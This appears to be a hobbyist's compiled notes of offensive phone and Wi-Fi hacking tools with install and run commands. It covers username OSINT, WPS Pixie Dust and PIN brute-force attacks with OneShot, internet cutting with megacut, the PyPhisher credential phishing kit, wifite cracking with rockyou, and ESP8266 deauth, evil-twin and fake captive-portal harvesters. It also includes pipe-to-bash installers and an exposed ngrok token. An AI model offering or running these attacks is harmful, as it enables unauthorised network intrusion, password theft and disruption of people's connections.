NExfil is an OSINT tool written in python for finding profiles by username. The provided usernames are checked on over 350 websites within few seconds. The goal behind this tool was to get results quickly while maintaining low amounts of false positives.

📍git clone https://github.com/thewhiteh4t/nexfil.git
📍cd nexfil
📍pip3 install -r requirements.txt

¶¶ Usage :

usage: nexfil.py [-h] [-u U] [-f F] [-l L] [-t T] [-v] [-U]

nexfil - Find social media profiles on the web | v1.0.1

options:
-h, --help show this help message and exit
-u U Specify username
-f F Specify a file containing username list
-l L Specify multiple comma separated usernames
-t T Specify timeout [Default : 5]
-v Prints version
-U Check for Updates

¶¶ Single username

python3 nexfil.py -u username
Multiple comma separated usernames

python3 nexfil.py -l "user1,user2"
Username list in a file

python3 nexfil.py -f users.txt

¶¶ Stryker - mobile pentest
--Root-Your-Device-1st--

#android #kekstore #pwnterm #kekhunter #materialhunter #stryker
#pixiedust
#bruteforcepin
#connectwithpin
#passwordbruteforce
#wordlist
#capturehandshake
#clientdeauthing

Test your networks for the most effective and dangerous vulnerabilities!

¶¶Download Stryker APK -Link Below
https://stryker.zalex.dev/
https://zalex.dev/stryker/#download

¶¶ Stryker - mobile pentest
--Root-Your-Device-1st--

#android #kekstore #pwnterm #kekhunter #materialhunter #stryker
#pixiedust
#bruteforcepin
#connectwithpin
#passwordbruteforce
#capturehandshake
#clientdeauthing

Test your networks for the most effective and dangerous vulnerabilities!

¶¶Download Stryker APK -Link Below
https://stryker.zalex.dev/
https://zalex.dev/stryker/#download

¶¶Github = https://github.com/stryker-project/app/releases


¶¶ The Stryker Project — user-friendly app for mobile pentest.
Status: Coding
Git: https://github.com/stryker-project

¶¶ If you need help join telegram channel
@strykereng <- Channel with news and updates [ENG]
@strykerapp <- Channel with news and updates [RU]
@strykerchat <- Chat with developer

¶¶ Mini dongle /works with samsungNote9 /no need to install drivers

¶¶ Aliexpress
MVR 44.09 31%OFF | 300Mbps 5dBi USB WiFi Adapter Mini Dongle External Wireless LAN Network Card 2.4GHz 802.11n/g/b for PC Computer for Win 7 8 10
https://a.aliexpress.com/_m0ThS86

¶¶ extra long antenna
2.4G 10dBi High Gain Antenna
length: 400mm
https://a.aliexpress.com/_mObNMlc

¶¶ Amazone
Alfa AWUS036NHA - Wireless B/G/N USB Adaptor - 802.11n - 150Mbps - 2.4 GHz - 5dBi Antenna - Long Range - Atheros Chipset - Windows XP/Vista 64-Bit /128-Bit Windows 7 Compatible https://www.amazon.com/dp/B004Y6MIXS/ref=cm_sw_r_awdo_PBARX7TVSMGAHW6M38Z7

¶¶ megacut

A new powerful Python3 tool for managing internet on a local network

📍git clone https://github.com/stryker-project/megacut
📍cd megacut
📍pip install -r requirements.txt
📍python3 megacut.py

¶¶ Options & Syntax
python3 megacut.py target gateway -m\-k\-b\-r

-k Kill inet on target ip

-m Permanently disable inet on target (only if -k not works)

-b Disable inet for 20 seconds

-r Restore inet on target ip

¶¶ Examples:
python3 megacut.py 192.168.1.101 192.168.1.1 -k

¶¶Install ngrok on termux
Open chrome

¶¶Go to
https://dashboard.ngrok.com/signup
Signup with a new gmail
aftee that go to termux and copy past this

📍wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-arm64.tgz
¶¶ when download is completed

( to extract it type )
📍tar vxzf ngrok-v3-stable-linux-arm64.tgz

¶¶Now go back to chrome ngrok page and lets add our ngrok token copy it full

Example = ngrok config add-authtoken 55NulkHPoB9SsymNPp6U1ewIX2m_3bZakfrsceXpQR1gkay4L
( add ./ after that full link )
¶¶Go back to termux and past i with ./
📍./ngrok config add-authtoken 55NulkHPoB9SsymNPp6U1ewIX2m_3bZakfrsceXpQR1gkay4L

(Open Hotspot in your phone ) before using

¶¶ Seema
#wordlist
a random password generator tool which generates a random password of your choice. If you wants easy password, then it will generate a random easy password and give you and ask from you whether you wants to save or not. If you doesn't want to save your password and it will stop processing but if you wants to save your password then, it will ask from you a name for your password.

📍apt-get update && apt-get upgrade -y
📍apt-get install python git -y
📍git clone https://github.com/adarshaddee/Seema.git
📍cd Seema
📍chmod +x setup.sh
📍./setup.sh

OR YOU CAN USE

📍pip install -r requirements.txt
📍python Seema.py

------------------------------------------------


Random-Password-Generator

Program written by Python Language

Requirements

apt update && apt upgrade pkg install python pip install requests

Run

cd Random-Password-Generator python gen_rand_passwd.py

WPS PIN attacks Pixie Dust, online bruteforce, without monitor mode with the wpa_supplicant

Using installer
curl -sSf https://raw.githubusercontent.com/drygdryg/OneShot_Termux_installer/master/installer.sh | bash

¶¶ Manually Installing requirements
📍pkg install -y root-repo
📍pkg install -y git tsu python
📍wpa-supplicant pixiewps iw


¶¶ Getting OneShot

📍git clone --depth 1 https://github.com/drygdryg/OneShot OneShot


¶¶ Running
📍sudo python OneShot/oneshot.py -i wlan0 --iface-down -K

¶¶ Start Pixie Dust attack on a specified BSSID:
📍sudo python3 oneshot.py -i wlan0 -b 00:90:4C:C1:AC:21 -K

¶¶ Show avaliable networks and start
📍sudo python3 oneshot.py -i wlan0 -K

¶¶ Launch online WPS bruteforce
📍sudo python3 oneshot.py -i wlan0 -b 00:90:4C:C1:AC:21 -B -p 1234


¶¶ Start WPS push button connection:s

📍sudo python3 oneshot.py -i wlan0 --pbc

¶¶ Troubleshooting check this link below and give it a try it .tested on samsung note10 plus / and as u can see it works for me

📍https://github.com/drygdryg/OneShot

¶¶ wpspin

WPS PIN generator uses known MAC address based algorithms commonly found in routers firmware to generate their default PINs. The PIN can be used with programs like Reaver, Bully or OneShot to recover Wi-Fi password.

Installation
📍pip install wpspin
Or you can install from source with:

📍git clone https://github.com/drygdryg/wpspin.git
📍cd wpspin/
📍python setup.py install

Example:

📍$ wpspin 54:A0:50:75:D2:40

¶¶ PyPhisher /65Tools
#phishing #socialmedia #kalinethunter #termux

Ultimate phishing tool in python. Includes popular websites like facebook, twitter, instagram, github, reddit, gmail and many others

git clone https://github.com/KasRoudra/PyPhisher
cd PyPhisher
python3 pyphisher.py

¶¶ Or, directly run

wget https://raw.githubusercontent.com/KasRoudra/PyPhisher/main/pyphisher.py && python3 pyphisher.py

¶¶ Golismero
Web Application Vulnerability Scanner




sudo bash
apt-get install python2.7 python2.7-dev python-pip python-docutils git perl nmap sslscan cd /opt
git clone https://github.com/golismero/golismero.git
cd golismero
pip install -r requirements.txt pip install -r requirements_unix.txt
ln -s /opt/golismero/golismero.py /usr/bin/golismero

exit

¶¶ JFScan lets you utilize Masscan to scan for open ports and use Nmap scripts on discovered ports to scan for services. JFScan allows you to run a scan of many different targets using the targets flag(-t) followed by a text file with the domain/IP/URL listed inside.

📍sudo apt install libpcap-dev git clone https://github.com/robertdavidgraham/masscan
📍cd masscan
📍make
📍sudo make install
📍sudo setcap CAP_NET_RAW+ep /usr/bin/masscan

¶¶ to install JFScan back in your home directory
📍cd ~
📍git clone https://github.com/nullt3r/jfscan.git $ 📍cd jfscan
📍pip3 install .


usage:
jfscan [-h] -t TARGETS [--resolvers RESOLVERS] [-m MODULES] (-p PORTS | -tp TOP_PORTS) [-r MAX_RATE] [-oi] [-od] [-q] [--nmap] [--nmap-options NMAP_OPTIONS] [--nmap-threads NMAP_THREADS] [--nmap-output NMAP_OUTPUT]

¶¶ sherlock
#sherlock #socialmedia #info #nethunter #termux

📍git clone https://github.com/sherlock-project/sherlock.git

📍cd sherlock
📍python3 -m pip install -r requirements.txt
📍python3 sherlock --help

¶¶ To search for only one user:
📍python3 sherlock user123

¶¶ To search for more than one user:
📍python3 sherlock user1 user2 user3

¶¶ This package contains the rockyou.txt wordlist and has an installation size of 134 MB.
#wordlist #rockyou #fern
📍sudo apt install wordlists
📍wordlists -h
> wordlists ~ Contains the rockyou wordlist /usr/share/wordlists
|--dirb |--dirbuster
|--dnsmap.txt
|--fasttrack.txt
|--fern-wifi
|--metasploit
|--nmap.lst
|--rockyou.txt.gz
|--seclists
|--wfuzz

#wifite /
to make it easy and fast

📍sudo wifite -i wlan0 --ignore-locks --keep-ivs -p 1337 -mac --random-mac -v -inf --bully --pmkid --dic /usr/share/wordlists/rockyou.txt --require-fakeauth --nodeauth --wps --pmkid-timeout 120

#wifite / all commands v3

#pyrit erro fix
#wifte

¶¶ If you run into any problems installing Pyrit. You may need to install the following packages and reinstall.

📍apt install python2 build-essential python2-dev libpcap-dev libssl-dev


installation:-

📍git clone https://github.com/JPaulMora/Pyrit.git;cd Pyrit

📍python2 setup.py clean;sudo python2 setup.py build;sudo python2 setup.py install

¶¶ put this on androidsu
copy & past in androidsu

pm grant com.offsec.nethunter android.permission.ACCESS_FINE_LOCATION

pm grant com.offsec.nethunter android.permission.ACCESS_COARSE_LOCATION

pm grant com.offsec.nethunter android.permission.READ_EXTERNAL_STORAGE


pm grant com.offsec.nethunter android.permission.WRITE_EXTERNAL_STORAGE

pm grant com.offsec.nethunter com.offsec.nhterm.permission.RUN_SCRIPT

pm grant com.offsec.nethunter com.offsec.nhterm.permission.RUN_SCRIPT_SU

pm grant com.offsec.nethunter com.offsec.nhterm.permission.RUN_SCRIPT_NH

pm grant com.offsec.nethunter com.offsec.nhterm.permission.RUN_SCRIPT_NH_LOGIN

#update
#ESP8266 #CH340 #nodemcu
Scan for WiFi devices, block selected connections, create dozens of networks and confuse WiFi scanners!

ESP8266 Deauther Version 2
https://github.com/SpacehuhnTech/esp8266_deauther

#Android
https://play.google.com/store/apps/details?id=com.bluino.esploader

¶¶ Fluxion-on-esp8266
This is a Advance Fluxion tool on esp8266...
#esp8266

¶¶ Connect to the AP named "M1z23R" with password:- "deauther" from your phone/PC.
¶¶ in chrome browser open 192.168.4.1
¶¶ You will see list of target (nearby )
¶¶ select your target
¶¶ click on deauthing
¶¶ after that click on evil twin attack
¶¶ check wifi .You will see open network with victim ssid .when victims enter correct password it will close and change to "M1z23R" again open in chrome browser 192.168.4.1 below will be the password

¶¶ Readme: https://github.com/pitube08642/Fluxion-on-ESP8266

¶¶ android app ( if you get error move on to pc )

¶¶ Android application
https://play.google.com/store/apps/details?id=com.bluino.esploader

¶¶ esp8266

ESPortalV2 is a WiFi Captive Portal Credential Harvester (Phisher) for ESP8266 Devices. Fake a "Free WiFi HotSpot" with spoofed login pages.

¶¶ SSID: "Free WiFi"
URL: http://192.168.1.1/esportal

¶¶ username "admin"
password "hacktheplanet"

¶¶ Readme : https://github.com/exploitagency/ESPortalV2

¶¶ esp
#cafey


ESPBug is a rogue captive portal program which runs on the ESP8266 dev board, such as the NodeMCU (clones included). It is a social engennering tool which generates a WiFi network of a given name alluring people to connect to it and enter some credentials.

When you connect to the ESPBug, go to any domain name and to the espportal page (e.g. http://espbug.com/espportal) You should be shown a pop up window asking you for the password. Defaults are Username: espbug and Password: password. From there you are redirected to the home page.

¶¶ Readme : https://www.youtube.com/watch?v=X95rtPqSzw4